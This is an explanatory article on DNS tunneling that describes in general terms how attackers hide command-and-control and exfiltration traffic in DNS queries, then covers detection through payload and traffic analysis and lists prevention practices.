What Is DNS Tunneling?

DLS tunneling is a type of cyberattack that allows hackers to bypass network security by using the Domain Name System (DNS) as a transport for malicious traffic. By hiding non-DNS traffic within DNS packets, attackers can often bypass network security measures. Successful DNS tunneling attacks allow hackers to bypass network security, exfiltrate data, control other computers, collect user credentials, or explore a network’s footprint for future attacks.

DNS is like GPS for the internet. DNS servers translate the human-readable names that users type into a web browser into machine-readable IP addresses — a string of numbers such as 2001:db8:3e8:2a3::b63 — that allow the browser to load the correct site. DNS lets people navigate the web using easy-to-remember domain names rather than keeping track of the IP address for the sites they want to visit.

Several things make DNS an attractive attack vector for hackers. Many applications and services rely on DNS queries, and DNS traffic is widely trusted. DNS protocols were not designed to be secure, but rather to quickly and accurately resolve requests for IP addresses without questioning the credentials or motives of the user or device making the request. In addition to resolving the domain names, DNS queries may also transfer small amounts of data between devices, servers, or systems. Because many organizations do not adequately analyze these packets for malicious activity, domain tunneling can be a highly effective DNS attack vector.

A DNS tunneling attack begins when a user downloads malware to a computer or a hacker successfully exploits a vulnerability in a computer system and installs a malicious payload. Typically, attackers will want to retain control of the device, enabling them to run commands or to transfer data out of the environment. To do this, attackers need to establish a tunnel — a way of sending commands and receiving data from the compromised system while avoiding detection by its network perimeter security measures.

DNS traffic is perfect for this exploit as it typically passes freely through perimeter security measures like firewalls. To create the tunnel, the attacker creates and registers a domain name, and configures an authoritative nameserver under the attacker’s control. When the malware on the victim’s device makes a DNS query for the attacker’s server, the server responds with DNS packets that contain data and commands for the compromised device. In this way, attackers can continuously communicate with the compromised device without setting off any alarms. An attacker may also send data encoded in queries sent to malicious authoritative nameservers.

DNS tunneling enables attackers to perform a variety of malicious activities.

• Installing malware. Attackers may use DNS tunneling to install malware on additional systems.
• Collecting credentials. Once they have command and control of a device, attackers can use keyloggers and other methods to collect user credentials that can be used to mount additional attacks or be sold on the dark web.
• Exploring the network. DNS queries from within an infected network can help attackers build a map of the network, identifying systems and high-value assets.
• Exfiltrating data. Cybercriminals may use DNS tunneling to transfer data out of the network, including sensitive or confidential user information.
• Controlling devices. With the ability to control an infected device, attackers can trigger other threats such as DDoS attacks.

Many businesses don’t monitor their DNS traffic for malicious activity.

Security teams can analyze payloads and traffic for signs of a DNS tunneling attack.

Payload analysis looks at the contents of DNS requests and responses. For example, unusual hostnames, or significant differences between the size of a DNS request and the response, may be a sign of suspicious activity. Payload analysis may also search for unusual character sets, strange information being sent via DNS, DNS record types that are not frequently used, or recurring patterns from source IP addresses sending the most traffic.

Traffic analysis monitors data like the number of requests made, where they originate, the history of domains, and DNS anomalous behavior. IT teams may also analyze the size of packets since DNS tunneling typically generates larger packet sizes.

To prevent DNS tunneling attacks, IT and security teams may follow several cybersecurity best practices.

• Conduct security awareness training to help employees avoid clicking on malicious links, opening suspicious emails and attachments, or taking other actions that could trigger malware.
• Implement advanced antivirus and anti-malware technology to help avoid malware installation, which is often the first step in establishing a DNS tunnel.
• Deploy technology to perform a deep scan of all network traffic — including DNS requests — to uncover DNS tunneling attacks.
• Monitor DNS tunneling VPN services, such as antivirus programs and other security solutions that use DNS tunneling to fetch signatures but could also be used for illegitimate reasons.
• Deploy DNS firewalls or DNS tunneling utilities that monitor for suspicious behavior.
• Adopt advanced threat protection solutions to improve DNS security, block malware, stop data exfiltration, and uncover malicious content embedded within DNS traffic.